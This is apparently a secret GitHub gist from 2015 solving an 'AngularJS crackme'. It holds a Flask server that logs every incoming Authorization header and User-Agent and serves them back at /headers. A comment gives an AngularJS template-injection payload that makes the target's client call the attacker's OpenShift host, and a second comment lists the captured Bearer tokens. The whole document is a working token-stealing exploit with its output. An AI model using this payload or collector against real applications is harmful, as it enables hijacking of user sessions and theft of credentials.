/angularjs-crackme.py
Secret
Created Nov 17, 2015
| from flask import Flask | |
| from flask.ext.cors import CORS | |
| from flask import request | |
| import json | |
| app = Flask(__name__) | |
| CORS(app) | |
| h = ['test'] | |
| @app.route("/") | |
| def helloWorld(): | |
| global h | |
| h.append((request.headers.get('Authorization'),request.headers.get('User-Agent'))) | |
| return "Hello!" | |
| @app.route("/headers") | |
| def headers(): | |
| global h | |
| return json.dumps(h) | |
| if __name__ == '__main__': | |
| app.run() | |
| # PoC AngularJS payload | |
| # {[{todos.oneUrl('xx','http://<OPENSHIFT-URL>/').get()}]} | |
| # | |
| # Captured | |
| # ["test", ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer NmY2OWI3ODUtZGVhZC1iZWE3LWIzM2YtMjQyNDZiMmUzOGQz", "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"], ["Bearer ZDYwYTM2YjUtYmFkYS00ZTE5LWFjNGMtNThkODI3Zjk4MTk1", "Mozilla/5.0 (X11; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.3.0"]] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment